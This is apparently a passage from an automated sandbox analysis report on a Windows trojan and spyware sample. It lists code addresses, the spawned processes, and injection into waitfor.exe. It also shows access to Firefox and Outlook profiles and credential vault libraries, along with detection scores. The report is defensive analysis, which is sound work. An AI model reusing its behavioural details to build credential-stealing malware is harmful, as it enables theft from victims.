                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01525BF0 | 4_2_01525BF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014EDBF9 | 4_2_014EDBF9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CFB80 | 4_2_014CFB80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01567A46 | 4_2_01567A46
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156FA49 | 4_2_0156FA49
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01523A6C | 4_2_01523A6C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0155DAC6 | 4_2_0155DAC6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014F5AA0 | 4_2_014F5AA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01551AA3 | 4_2_01551AA3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0154DAAC | 4_2_0154DAAC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B3D40 | 4_2_014B3D40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01561D5A | 4_2_01561D5A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01567D73 | 4_2_01567D73
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CFDC0 | 4_2_014CFDC0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01529C32 | 4_2_01529C32
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156FCF2 | 4_2_0156FCF2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156FF09 | 4_2_0156FF09
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B1F92 | 4_2_014B1F92
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156FFB1 | 4_2_0156FFB1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B9EB0 | 4_2_014B9EB0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0484E4F6 | 7_2_0484E4F6
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04844420 | 7_2_04844420
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04852446 | 7_2_04852446
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04860591 | 7_2_04860591
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A0535 | 7_2_047A0535
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047BC6E0 | 7_2_047BC6E0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A0770 | 7_2_047A0770
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047C4750 | 7_2_047C4750
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0479C7C0 | 7_2_0479C7C0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04832000 | 7_2_04832000
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048541A2 | 7_2_048541A2
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048601AA | 7_2_048601AA
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048581CC | 7_2_048581CC
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04790100 | 7_2_04790100
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0483A118 | 7_2_0483A118
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04828158 | 7_2_04828158
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048202C0 | 7_2_048202C0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04840274 | 7_2_04840274
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048603E6 | 7_2_048603E6
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047AE3F0 | 7_2_047AE3F0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485A352 | 7_2_0485A352
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04840CB5 | 7_2_04840CB5
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A0C00 | 7_2_047A0C00
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04790CF2 | 7_2_04790CF2
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047AAD00 | 7_2_047AAD00
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0479ADE0 | 7_2_0479ADE0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0483CD1F | 7_2_0483CD1F
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047B8DBF | 7_2_047B8DBF
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485CE93 | 7_2_0485CE93
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A0E59 | 7_2_047A0E59
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485EEDB | 7_2_0485EEDB
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485EE26 | 7_2_0485EE26
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047B2E90 | 7_2_047B2E90
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0481EFA0 | 7_2_0481EFA0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047C0F30 | 7_2_047C0F30
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047E2F28 | 7_2_047E2F28
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047ACFE0 | 7_2_047ACFE0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04792FC8 | 7_2_04792FC8
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04842F30 | 7_2_04842F30
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04814F40 | 7_2_04814F40
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047AA840 | 7_2_047AA840
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A2840 | 7_2_047A2840
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047CE8F0 | 7_2_047CE8F0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047868B8 | 7_2_047868B8
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047B6962 | 7_2_047B6962
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0486A9A6 | 7_2_0486A9A6
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A29A0 | 7_2_047A29A0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0479EA80 | 7_2_0479EA80
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04856BD7 | 7_2_04856BD7
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485AB40 | 7_2_0485AB40
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04791460 | 7_2_04791460
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485F43F | 7_2_0485F43F
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0483D5B0 | 7_2_0483D5B0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048695C3 | 7_2_048695C3
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04857571 | 7_2_04857571
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048516CC | 7_2_048516CC
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047E5630 | 7_2_047E5630
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485F7B0 | 7_2_0485F7B0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047917EC | 7_2_047917EC
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0484F0CC | 7_2_0484F0CC
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485F0E0 | 7_2_0485F0E0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048570E9 | 7_2_048570E9
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A70C0 | 7_2_047A70C0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0478F172 | 7_2_0478F172
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D516C | 7_2_047D516C
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047AB1B0 | 7_2_047AB1B0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0486B16B | 7_2_0486B16B
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_048412ED | 7_2_048412ED
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047BB2C0 | 7_2_047BB2C0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A52A0 | 7_2_047A52A0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0478D34C | 7_2_0478D34C
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485132D | 7_2_0485132D
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047E739A | 7_2_047E739A
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485FCF2 | 7_2_0485FCF2
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04819C32 | 7_2_04819C32
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A3D40 | 7_2_047A3D40
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047BFDC0 | 7_2_047BFDC0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04851D5A | 7_2_04851D5A
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04857D73 | 7_2_04857D73
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A9EB0 | 7_2_047A9EB0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485FFB1 | 7_2_0485FFB1
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485FF09 | 7_2_0485FF09
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04763FD5 | 7_2_04763FD5
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04763FD2 | 7_2_04763FD2
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A1F92 | 7_2_047A1F92
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0480D800 | 7_2_0480D800
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A38E0 | 7_2_047A38E0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047A9950 | 7_2_047A9950
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047BB950 | 7_2_047BB950
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04835910 | 7_2_04835910
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04841AA3 | 7_2_04841AA3
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0483DAAC | 7_2_0483DAAC
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0484DAC6 | 7_2_0484DAC6
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04857A46 | 7_2_04857A46
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485FA49 | 7_2_0485FA49
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047E5AA0 | 7_2_047E5AA0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04813A6C | 7_2_04813A6C
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04815BF0 | 7_2_04815BF0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047DDBF9 | 7_2_047DDBF9
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0485FB76 | 7_2_0485FB76
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047BFB807_2_047BFB80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008222A07_2_008222A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0083C0407_2_0083C040
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081D16A7_2_0081D16A
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081D1707_2_0081D170
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081B3807_2_0081B380
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081D3907_2_0081D390
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008113A17_2_008113A1
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081B4C47_2_0081B4C4
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0081B4D07_2_0081B4D0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008259507_2_00825950
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00823B5B7_2_00823B5B
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00823B607_2_00823B60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABE4757_2_04ABE475
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABE3547_2_04ABE354
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABD8D87_2_04ABD8D8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABE80C7_2_04ABE80C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: String function: 0151EA12 appears 86 times
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: String function: 014F7E54 appears 109 times
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: String function: 014E5130 appears 58 times
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: String function: 0152F290 appears 105 times
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: String function: 0149B970 appears 283 times
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: String function: 0481F290 appears 105 times
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: String function: 047E7E54 appears 109 times
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: String function: 0478B970 appears 283 times
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: String function: 047D5130 appears 58 times
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: String function: 0480EA12 appears 86 times
Source: suBpo1g13Q.exe; Static PE information: invalid certificate
Source: suBpo1g13Q.exe, 00000000.00000002.1362958856.0000000008FA0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe, 00000000.00000002.1360738579.00000000053A0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe, 00000000.00000002.1356748428.0000000002B70000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe, 00000000.00000000.1329155415.0000000000732000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameOGGCS.exe. vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe, 00000000.00000002.1358229387.0000000003B29000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe, 00000000.00000002.1355340537.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamewaitfor.exej% vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe, 00000004.00000002.1637461688.000000000159D000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe; Binary or memory string: OriginalFilenameOGGCS.exe. vs suBpo1g13Q.exe
Source: suBpo1g13Q.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: suBpo1g13Q.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@9/2@12/12
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\suBpo1g13Q.exe.log
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Mutant created: NULL
Source: C:\Windows\SysWOW64\waitfor.exe; File created: C:\Users\user\AppData\Local\Temp\FxK39HI69
Source: suBpo1g13Q.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files\Mozilla Firefox\firefox.exe; File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: waitfor.exe, 00000007.00000002.3803338370.0000000002BD5000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1827943912.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3803338370.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1827595373.0000000002B85000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1831995181.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: suBpo1g13Q.exe; Virustotal: Detection: 38%
Source: suBpo1g13Q.exe; ReversingLabs: Detection: 68%
Source: unknown; Process created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Process created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Process created: C:\Users\user\Desktop\suBpo1g13Q.exe "C:\Users\user\Desktop\suBpo1g13Q.exe"
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe; Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
Source: C:\Windows\SysWOW64\waitfor.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: version.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: wldp.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: profapi.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: amsi.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: userenv.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe; Section loaded: wininet.dll
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe; Section loaded: mswsock.dll
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe; Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe; Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe; Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe; Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\waitfor.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: suBpo1g13Q.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: suBpo1g13Q.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: suBpo1g13Q.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: OGGCS.pdbSHA256 source: suBpo1g13Q.exe
Source: Binary string: waitfor.pdbGCTL source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: waitfor.pdb source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iBkWOgpZKSoi.exe, 00000006.00000002.3804555588.000000000035E000.00000002.00000001.01000000.0000000C.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1709108519.000000000035E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: suBpo1g13Q.exe, suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OGGCS.pdb source: suBpo1g13Q.exe
Source: suBpo1g13Q.exe; Static PE information: 0xD3B6A135 [Wed Jul 22 15:56:37 2082 UTC]
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_0041F993 push edi; iretd 4_2_0041F99F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_0041A218 push ebp; ret 4_2_0041A219
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_00405CA0 push ds; iretd 4_2_00405CA1
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_00403580 push eax; ret 4_2_00403582
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_00416E2A push esp; iretd 4_2_00416E2B
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_00419764 push ebp; ret 4_2_004197A3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_004167F3 push FFFFFFBEh; retf 4_2_0041683D
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Code function: 4_2_014A09AD push ecx; mov dword ptr [esp], ecx 4_2_014A09B6
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_047627FA pushad ; ret 7_2_047627F9
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0476225F pushad ; ret 7_2_047627F9
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0476283D push eax; iretd 7_2_04762858
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_047909AD push ecx; mov dword ptr [esp], ecx 7_2_047909B6
